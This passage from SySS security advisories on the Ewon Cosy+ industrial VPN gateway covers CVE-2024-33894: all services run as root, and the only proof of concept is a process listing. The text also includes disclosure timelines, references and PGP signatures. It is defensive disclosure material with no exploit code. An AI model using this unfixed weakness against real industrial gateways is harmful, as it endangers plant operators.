2024-04-16: Security advisory inculding technical details provided to  
             the manufacturer  
2024-04-18: Vulnerability fixed by the manufacturer  
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer  
2024-07-12: Manufacturer asked for reviewing the blog post draft  
2024-07-12: Confirmed reviewing the blog post is possible and asking for  
             the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-043  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33897  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0  
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS  
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0  
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I  
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI  
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l  
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg  
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK  
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ  
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP  
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ  
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=  
=JS3w  
-----END PGP SIGNATURE-----

Ewon Cosy+ / Talk2M Remote Access Solution Improper Authentication

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The Ewon Cosy+ executes all tasks and services in the context of the user "root" and therefore with the highest system privileges. By compromising a single service, attackers automatically gain full system access.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-033  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: all versions  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Execution with Unnecessary Privileges (CWE-250)  
Risk Level:                Low  
Solution Status:           Open  
Manufacturer Notification: 2024-04-10  
Solution Date:             Not yet fixed  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33894  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Ewon Cosy+ executes all tasks and services in the context  
of the user "root" and therefore with the highest system privileges.

By compromising a single service, attackers automatically gain full  
system access.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Examining running processes:  
$> ps  
   PID USER       VSZ STAT COMMAND  
     1 root      6248 S    {systemd} /sbin/init  
     2 root         0 SW   [kthreadd]  
     3 root         0 IW   [kworker/0:0]  
     5 root         0 IW   [kworker/u2:0]  
     6 root         0 IW<  [mm_percpu_wq]  
     7 root         0 SW   [ksoftirqd/0]  
     8 root         0 RW   [rcu_sched]  
     9 root         0 IW   [rcu_bh]  
   205 root      3044 S    udevd --daemon  
   491 root     23344 S    /usr/lib/systemd/systemd-journald  
   505 root      3524 S    /usr/lib/systemd/systemd-udevd  
   530 root         0 IW   [kworker/u2:2]  
   536 root     11908 S    /usr/sbin/rngd -f -r /dev/hwrng  
   537 root     50364 S    /usr/sbin/ModemManager --log-journal  
   538 root      2232 S    /usr/sbin/klogd -n  
   539 root      2232 S    /usr/sbin/syslogd -n  
   542 root      3556 S    /sbin/agetty -o -p -- \u --noclear tty1 linux  
   547 root     22972 S    /usr/root/ewon/bin/modem-manager-handler  
   549 root     29860 R    /usr/root/ewon/bin/sysDSupervisor  
   555 root     21868 S    /usr/root/ewon/bin/sysUpdateManager  
   565 root      4760 S    /usr/lib/systemd/systemd-logind  
   623 root     52596 S    /usr/root/ewon/bin/ewon  
   742 root     14064 S    eveusbd -p  
   746 root     11696 S    /usr/sbin/chronyd -4 -n  
   790 root      2232 S    udhcpc --script=/usr/root/ewon/bin/bootpdhcp/dhcpc.s  
   853 root         0 IW<  [kworker/u3:3]  
   926 root         0 RW   [kworker/0:2]  
  1209 root         0 IW<  [kworker/0:0H]  
  1274 root         0 IW<  [kworker/0:2H]  
  1308 root      5004 S    openvpn --auth-nocache --config /var/run/openvpn.con  
  1315 root      2496 S    sh

     [...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer, no fix is planned for the current device  
generation and it is on the roadmap for future generations.[7]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-04: Vulnerability discovered  
2024-04-10: Vulnerability reported to manufacturer  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-19: Manufacturer sent a technical overview of the analysis;  
             a fix is planned for the next device generation  
2024-04-30: CVE ID CVE-2024-33894[4] assigned by the manufacturer  
2024-05-31: Manufacturer asked if the blog post[5] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog  
             post  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[6]  
2024-08-11: Blog post published[5]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-033  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-033.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] CVE-2024-33894  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33894  
[5] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[6] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
[7] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay45EACgkQrgyb+PE0  
i1P5LRAAg9gPOXRL6URvnvUSI9Tsrqr/sNXbEm6ZxnBjmOtrSACUqvL/3G1mg31M  
2zBXF/P4HnLgZPywO+XTI0F9QmwIhvGvksh/lvlMPt7sI9yk1Xt/UauSWYEEAqbT  
5wyq5i9K4ni9ehV0gnoBjwo+10wLpKOWn1sXBQkN93bGDexEJbxnxE/0/+3qjd1X  
WkzoZ6MvggSFTNJcF0XkHxjuvjCc8HHmto9TV8YjrzbmMvqPFVcVc/C8E5FkszFg  
SRUEfDaQMZgEcvXOeLOp/FkJwLIhp8yeGAseAy7ii5ZElmwELE7maE8/sxeCym9e  
f+ahwg0feHDFU1FYvY0s3sx6PJroy1K2wGS+JRXkHCC/Rn+gBkdOK+09u+GCBq3K  
+o8WYE92kLOjEYzdrkMh2/XAXVqFaBA7EzX49KLZjlFhwPL/AP2Se3Jne8G1HhNw  
jxmLHu1O1yBX28x6Je2COd0iNxIVgtg6skqIePZajMq1Gw9BOrzqO12IT+fr0ecO  
KlTs5zGsu1GhkmoGd2MZXuV0znty4UkTw1ozsNudwqftz6y3cwDmNKPSkSgmSr6a  
Ygwb0w10XncZruqZhabKLR7byfeLDiyRykQuOe3cYHmHW7X3N9wSqfzp6Bpn7bcx  
Qrr1dpzCn4LJRW14C3ZQD/KEjPVIHgZ+ZIkNjHGreG+mHKygTWA=  
=U9YV  
-----END PGP SIGNATURE-----

Source

Packet Storm